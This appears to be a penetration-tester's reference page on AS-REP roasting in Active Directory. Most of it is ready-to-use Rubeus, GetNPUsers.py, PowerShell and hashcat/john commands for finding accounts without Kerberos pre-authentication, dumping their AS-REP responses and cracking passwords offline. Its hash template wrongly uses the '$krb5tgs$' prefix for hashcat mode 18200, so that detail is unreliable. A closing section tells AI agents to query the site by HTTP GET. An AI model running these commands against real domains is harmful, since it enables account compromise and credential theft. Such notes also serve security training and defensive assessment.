# Exploitation - Kerberos AS\_REP roasting

### Overview

An ASP\_REP roasting attack is an attack on the `Kerberos` authentication protocol that involves compromising the password of an user account that do not require `Kerberos` pre-authentication.

The attack is based on the fact that the `KRB_AS_REP` response, in reply from the `KDC (Key Distribution Center)` for an initial authentication request `KRB_AS_REQ` to the `Authentication Service (AS)`, contains ciphertext encrypted using the client's secret key.

By default, the `KRB_AS_REQ` must include a timestamp encrypted with the client's secret key, in order to permit the verification of the user identity before the `KDC` returns a `KRB_AS_REP` response. This verification is omitted for user accounts that do not require `Kerberos` pre-authentication, i.e accounts with the account property `DONT_REQ_PREAUTH`. These user accounts secrets are exposed to offline cracking, against the ciphertext, attack that are much faster and can not be time restricted.

### Automated DONT\_REQ\_PREAUTH user accounts discovery and export of AS-REP responses

The following tools can be used to automate the discovery of user accounts that do not require `Kerberos` pre-authentication and the request and export of `KRB_AS_REQ` response for offline cracking.

In order to enumerate the domain user accounts, `Rubeus` / `GetNPUsers.py` must be started in a domain authenticated security context or provided with working domain credentials.

```
Rubeus.exe asreproast /outfile:<FILE>
Rubeus.exe asreproast /format:john /outfile:<FILE>

Rubeus.exe asreproast /creduser:'<DOMAIN_FQDN>\<USERNAME>' /credpassword:'<PASSWORD>' /dc:<DC_HOSTNAME | DC_IP> /domain:<DOMAIN_FQDN> /outfile:<FILE_PATH>

# Will attempt to request a TGT for all users.
GetNPUsers.py -request <DOMAIN>/<USERNAME>[:<PASSWORD>]
```

### DONT\_REQ\_PREAUTH user accounts discovery

The following tools can be used to discover user accounts that do not require `Kerberos` pre-authentication:

```
Get-ADUser -LdapFilter "(&(objectclass=user)(objectcategory=user)(useraccountcontrol:1.2.840.113556.1.4.803:=4194304))"
Get-ADUser -Server <DC_HOSTNAME | DC_IP> -Credential <PSCredential> -LdapFilter "(&(objectclass=user)(objectcategory=user)(useraccountcontrol:1.2.840.113556.1.4.803:=4194304))"

Get-NetUser -LdapFilter "(&(objectclass=user)(objectcategory=user)(useraccountcontrol:1.2.840.113556.1.4.803:=4194304))"
Get-NetUser -Server <DC_HOSTNAME | DC_IP> -Credential <PSCredential> -LdapFilter "(&(objectclass=user)(objectcategory=user)(useraccountcontrol:1.2.840.113556.1.4.803:=4194304))"
```

### Request and export of KRB\_AS\_REP responses

The following tools can be used to request and export `KRB_AS_REP` for user accounts that do not require `Kerberos` pre-authentication.

The following operations do not require the knowledge of valid credentials.

```
Rubeus.exe asreproast /user:<USERNAME> /outfile:<FILE>
Rubeus.exe asreproast /dc:<DC_HOSTNAME | DC_IP> /domain:<DOMAIN_FQDN> /user:<USERNAME> /outfile:<FILE>

GetNPUsers.py '<DOMAIN>/' -usersfile <USERNAMES_FILE>
GetNPUsers.py '<DOMAIN>/' -dc-ip <DC_HOSTNAME | DC_IP> -usersfile <USERNAMES_FILE> -format john
```

### Offline cracking of KRB\_AS\_REP responses

Both `John the Ripper` (magnumripper fork) and `hashcat` can be used to crack the `KRB_AS_REP` responses.

The hash needs to respect the following format to be recognized `hashcat`:

```
# ENCRYPTION_TYPE 23 = RC4
# ENCRYPTION_TYPE 17 = AES128
# ENCRYPTION_TYPE 18 = AES256

$krb5tgs$<ENCRYPTION_TYPE>$*<USERNAME>@<DOMAIN>:$85DA[...]
```

Depending on the tool used, the hash retrieved may need to be manually updated.

The following commands can be used to crack the `KRB_AS_REP` responses:

```
# Its recommended to use Hashcat on a Windows OS for better performance due to driver compatibility
hashcat64.exe -m 18200 -a 0 [-r <RULE_FILE>] '[<HASH> | <HASHFILE>]' <WORDLIST>

john --wordlist=<WORDLIST> <HASHFILE>
```

***

### References

<https://www.harmj0y.net/blog/activedirectory/roasting-as-reps/> <https://tools.ietf.org/html/rfc4120#page-60> <https://beta.hackndo.com/kerberos-asrep-roasting/> <https://adsecurity.org/?p=227>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://notes.qazeer.io/active-directory/exploitation-kerberos_as_rep_roasting.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.